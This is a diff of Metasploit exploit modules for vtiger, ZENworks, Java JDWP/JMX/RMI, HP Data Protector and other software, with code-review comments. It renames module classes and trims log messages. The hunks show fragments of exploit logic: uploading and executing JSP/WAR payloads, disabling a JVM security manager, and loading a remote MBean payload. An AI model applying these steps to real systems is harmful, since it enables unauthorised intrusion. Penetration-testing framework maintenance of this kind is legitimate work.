@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -75,15 +75,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/vtiger_install_rce.rb b/modules/exploits/multi/http/vtiger_install_rce.rb index 3e76c223bf..46076f32c4 100644 --- a/modules/exploits/multi/http/vtiger_install_rce.rb +++ b/modules/exploits/multi/http/vtiger_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # Application database configuration is overwritten Rank = ManualRanking diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 92472d92bd..1ab8da5768 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index d8c06a41c1..89f2684aed 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb 
+++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include REXML @@ -89,15 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ - print_good("#{peer} - Upload successfully uploaded") + print_good("Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0) end diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 41e4dfa4da..4ad2b196c1 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote "form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition ) - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/work/resultimage.php"), 
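Review bot: In vtiger_soap_upload.rb (hunk at old line 89) `print_status("Uploading payload...")` is printed after `send_soap_request(soap)` has already returned, so the log announces the upload after it happened. Moving the status line above the request would make the log order match the order of requests the server sees. `print_good("Upload successfully uploaded")` could also be reworded to `print_good("Payload uploaded successfully")`. The method starts outside the hunk.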
@@ -115,18 +115,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end @target_path = normalize_uri("#{base}/results/#{fname}") - print_status("#{peer} - Requesting #{@target_path}") + print_status("Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 - print_error("#{peer} - Payload failed to upload") + print_error("Payload failed to upload") end end end diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index 4ec74e7e02..10ebc7548f 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 71c2f8d6eb..6c5bc618a3 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -209,13 +209,13 @@ class Metasploit3 < Msf::Exploit::Remote @base = normalize_uri(target_uri.path) @base << '/' if @base[-1, 1] != '/' - print_status("#{peer} - Getting cookie") + print_status("Getting cookie") cookie = get_cookie - print_status("#{peer} - Logging in") + print_status("Logging in") cred = login(cookie) - print_status("#{peer} - Triggering spam logging") + print_status("Triggering spam logging") inject_exec(cred) handler diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index 4bbe7f9e23..ef9c0d12c8 100644 
--- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index de4afd7a6a..f30690cf58 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zemra_panel_rce.rb b/modules/exploits/multi/http/zemra_panel_rce.rb index 57fdaadb76..5f6fb39320 100644 --- a/modules/exploits/multi/http/zemra_panel_rce.rb +++ b/modules/exploits/multi/http/zemra_panel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index f58aa5b783..5bba09e754 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file to #{tomcat_path}") + print_status("Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else - print_error("#{peer} - Failed to upload, try again with a different path?") + print_error("Failed to upload, try again with a different path?") return false end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote Rex.sleep(2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index f82eb98b9a..0abf38123e 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 9fa8a71709..18fe64bc64 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb 
@@ -8,7 +8,7 @@ require 'msf/core/exploit/php_exe' require 'nokogiri' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/ids/snort_dce_rpc.rb b/modules/exploits/multi/ids/snort_dce_rpc.rb index 04491e6dc0..75656d28c7 100644 --- a/modules/exploits/multi/ids/snort_dce_rpc.rb +++ b/modules/exploits/multi/ids/snort_dce_rpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Capture diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb index 5f709764b8..7e0ddefcb7 100644 --- a/modules/exploits/multi/misc/arkeia_agent_exec.rb +++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/batik_svg_java.rb b/modules/exploits/multi/misc/batik_svg_java.rb index e1b3ec975e..86db120167 100644 --- a/modules/exploits/multi/misc/batik_svg_java.rb +++ b/modules/exploits/multi/misc/batik_svg_java.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index c6861a0ea3..88087b8139 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote if fingerprint =~ /Data Protector A\.(\d+\.\d+)/ version = $1 - vprint_status("#{peer} - Windows / HP Data Protector version #{version} found") + vprint_status("Windows / HP Data Protector version #{version} found") elsif fingerprint =~ / INET/ - vprint_status("#{peer} - Linux / HP Data Protector found") + vprint_status("Linux / HP Data Protector found") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -106,25 +106,25 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_exec = rand_text_alpha(8) - print_status("#{peer} - Leaking the HP Data Protector directory...") + print_status("Leaking the HP Data Protector directory...") leak = leak_hp_directory(rand_exec) dir = parse_dir(leak, rand_exec) if dir.nil? dir = default_hp_dir - print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}") + print_error("HP Data Protector dir not found, using the default #{dir}") else unless valid_target?(dir) - print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") + print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") end end if target.name =~ /Windows/ #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true}) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_windows(payload.encoded, dir) else - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_linux(payload.encoded, dir) end end 
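Review bot: In hp_data_protector_exec_integutil.rb (hunk at old line 106) two non-fatal conditions are logged with `print_error` although execution continues in both: the fallback to `default_hp_dir` and the "looks incorrect, trying anyway" case. `print_warning` matches what happens, e.g. `print_warning("HP Data Protector dir not found, using the default #{dir}")`. The identical `print_status("Executing payload...")` in both branches of `if target.name =~ /Windows/` could be hoisted above the `if`. The commented-out `#command = cmd_psh_payload(...)` line should be removed or given a reason for staying.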
@@ -265,10 +265,10 @@ class Metasploit3 < Msf::Exploit::Remote def parse_dir(data, clue) if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") else dir = nil end diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index 01ea41fc06..5161aa9cc8 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index ecb6560c47..99f3775b53 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 3bd4d88285..412626afd9 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp 
@@ -265,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| if var != 0 && var % 1000 == 0 - vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + vprint_status("Parsed #{var} classes of #{nb_entries}") end data = {} @@ -691,13 +691,13 @@ class Metasploit3 < Msf::Exploit::Remote path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" if @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Linux target...") + print_warning("#{@os} system detected but using Linux target...") end when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" unless @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Windows target...") + print_warning("#{@os} system detected but using Windows target...") end end @@ -837,7 +837,7 @@ class Metasploit3 < Msf::Exploit::Remote # 2. Suspend the VM before setting the event suspend_vm - vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}") + vprint_status("Setting 'step into' event in thread: #{t_id}") step_info = format(@vars["objectid_size"], t_id) step_info << [STEP_MIN].pack('N') step_info << [STEP_INTO].pack('N') @@ -868,13 +868,13 @@ class Metasploit3 < Msf::Exploit::Remote value = get_value(sys_class["reftype_id"], sec_field) if(value == 0) - print_good("#{peer} - Security manager was not set") + print_good("Security manager was not set") else set_value(sys_class["reftype_id"], sec_field, 0) if get_value(sys_class["reftype_id"], sec_field) == 0 - print_good("#{peer} - Security manager has been disabled") + print_good("Security manager has been disabled") else - print_good("#{peer} - Security manager has not been disabled, trying anyway...") + print_good("Security manager has not been disabled, trying anyway...") end end end 
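Review bot: `print_good("Security manager has not been disabled, trying anyway...")` in the hunk at old line 868 of java_jdwp_debugger.rb reports a step that did not succeed at success level. Anyone skimming the output for green lines would take it for a positive result. `print_warning("Security manager has not been disabled, trying anyway...")` keeps the text and fixes the level. In the same hunk `if(value == 0)` would read more conventionally as `if value == 0`.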
@@ -884,7 +884,7 @@ class Metasploit3 < Msf::Exploit::Remote # 0. Fingerprinting OS fingerprint_os(thread_id) - vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") + vprint_status("Executing payload on \"#{@os}\", target version: #{version}") # 1. Prepares the payload payload_exe, pl_exe = setup_payload @@ -927,27 +927,27 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end - print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...") + print_status("Retrieving the sizes of variable sized data types in the target VM...") get_sizes - print_status("#{peer} - Getting the version of the target VM...") + print_status("Getting the version of the target VM...") get_version - print_status("#{peer} - Getting all currently loaded classes by the target VM...") + print_status("Getting all currently loaded classes by the target VM...") get_all_classes - print_status("#{peer} - Getting all running threads in the target VM...") + print_status("Getting all running threads in the target VM...") get_all_threads - print_status("#{peer} - Setting 'step into' event...") + print_status("Setting 'step into' event...") r_id, t_id = set_step_event - print_status("#{peer} - Resuming VM and waiting for an event...") + print_status("Resuming VM and waiting for an event...") response = resume_vm unless parse_event(response, r_id, t_id) datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...") + print_status("Received #{i + 1} responses that are not a 'step into' event...") buf = read_reply break if parse_event(buf, r_id, t_id) 
@@ -957,14 +957,14 @@ class Metasploit3 < Msf::Exploit::Remote end end - vprint_status("#{peer} - Received matching event from thread #{t_id}") - print_status("#{peer} - Deleting step event...") + vprint_status("Received matching event from thread #{t_id}") + print_status("Deleting step event...") clear_event(EVENT_STEP, r_id) - print_status("#{peer} - Disabling security manager if set...") + print_status("Disabling security manager if set...") disable_sec_manager - print_status("#{peer} - Dropping and executing payload...") + print_status("Dropping and executing payload...") exec_payload(t_id) disconnect diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index d5221281f4..b5149373ed 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer @@ -131,18 +131,18 @@ class Metasploit3 < Msf::Exploit::Remote @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") end - print_status("#{peer} - Discovering the JMXRMI endpoint...") + print_status("Discovering the JMXRMI endpoint...") mbean_server = discover_endpoint disconnect if mbean_server.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") else - print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") end # First try to connect to the original RHOST, since the mbean address may be inaccessible 
@@ -157,20 +157,20 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") end - print_status("#{peer} - Proceeding with handshake...") + print_status("Proceeding with handshake...") jmx_endpoint = handshake(mbean_server) if jmx_endpoint.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") else - print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") end - print_status("#{peer} - Loading payload...") + print_status("Loading payload...") unless load_payload(jmx_endpoint) fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_jmx_invoke( object_number: jmx_endpoint[:object_number], uid_number: jmx_endpoint[:uid].number, @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote return nil if ref.nil? unless ref[:object] == 'javax.management.remote.rmi.RMIServerImpl_Stub' - vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{ref[:object]}") + vprint_error("JMXRMI discovery returned unexpected object #{ref[:object]}") return nil end @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote ref = send_new_client(opts) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - JMXRMI discovery raised an exception of type #{e.message}") + vprint_error("JMXRMI discovery raised an exception of type #{e.message}") return nil end @@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload(conn_stub) - vprint_status("#{peer} - Getting JMXPayload instance...") + vprint_status("Getting JMXPayload instance...") begin res = send_jmx_get_object_instance( 
@@ -244,10 +244,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceNotFoundException' - vprint_warning("#{peer} - JMXPayload instance not found, trying to load") + vprint_warning("JMXPayload instance not found, trying to load") return load_payload_from_url(conn_stub) else - vprint_error("#{peer} - getObjectInstance returned unexpected exception #{e.message}") + vprint_error("getObjectInstance returned unexpected exception #{e.message}") return false end end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload_from_url(conn_stub) - vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...") + vprint_status("Creating javax.management.loading.MLet MBean...") begin res = send_jmx_create_mbean( @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceAlreadyExistsException' - vprint_good("#{peer} - javax.management.loading.MLet already exists") + vprint_good("javax.management.loading.MLet already exists") res = true when 'java.lang.SecurityException' - vprint_error("#{peer} - The provided user hasn't enough privileges") + vprint_error(" The provided user hasn't enough privileges") res = nil else - vprint_error("#{peer} - createMBean raised unexpected exception #{e.message}") + vprint_error("createMBean raised unexpected exception #{e.message}") res = nil end end if res.nil? - vprint_error("#{peer} - The request to createMBean failed") + vprint_error("The request to createMBean failed") return false end - vprint_status("#{peer} - Getting javax.management.loading.MLet instance...") + vprint_status("Getting javax.management.loading.MLet instance...") begin res = send_jmx_get_object_instance( object_number: conn_stub[:object_number], 
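Review bot: The `java.lang.SecurityException` branch in `load_payload_from_url` (hunk -272,23) now prints `" The provided user hasn't enough privileges"` with a leading space, apparently left over from stripping the `#{peer} - ` prefix. None of the other rewritten messages in this file carries one. The line should read `vprint_error("The provided user hasn't enough privileges")`. The method body continues past the end of this hunk.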
@@ -298,16 +298,16 @@ class Metasploit3 < Msf::Exploit::Remote name: 'DefaultDomain:type=MLet' ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - getObjectInstance returned unexpected exception: #{e.message}") + vprint_error("getObjectInstance returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The request to GetObjectInstance failed") + vprint_error("The request to GetObjectInstance failed") return false end - vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") + vprint_status("Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") begin res = send_jmx_invoke( @@ -320,12 +320,12 @@ class Metasploit3 < Msf::Exploit::Remote args: { 'java.lang.String' => "#{get_uri}/mlet" } ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - invoke() returned unexpected exception: #{e.message}") + vprint_error("invoke() returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The call to getMBeansFromURL failed") + vprint_error("The call to getMBeansFromURL failed") return false end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 3dae8dad96..6a5942c984 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Java::Rmi::Client @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") send_header ack = recv_protocol_ack if ack.nil? 
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote jar = rand_text_alpha(rand(8)+1) + '.jar' new_url = get_uri + '/' + jar - print_status("#{peer} - Sending RMI Call...") + print_status("Sending RMI Call...") dgc_interface_hash = calculate_interface_hash( [ { diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index ab1dd0e15b..fe8127cd92 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index c15c193ead..1c27b58489 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index 1dab5491c3..26465c6334 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb index 501df43124..d2bca2ffd0 100644 --- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb +++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index ed53e0b7f2..6307eda55d 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index b20a74ef78..4882496650 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/w3tw0rk_exec.rb b/modules/exploits/multi/misc/w3tw0rk_exec.rb index 9681bb3da0..3691b10e28 100644 --- a/modules/exploits/multi/misc/w3tw0rk_exec.rb +++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index ee804483e5..b481303f09 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp 
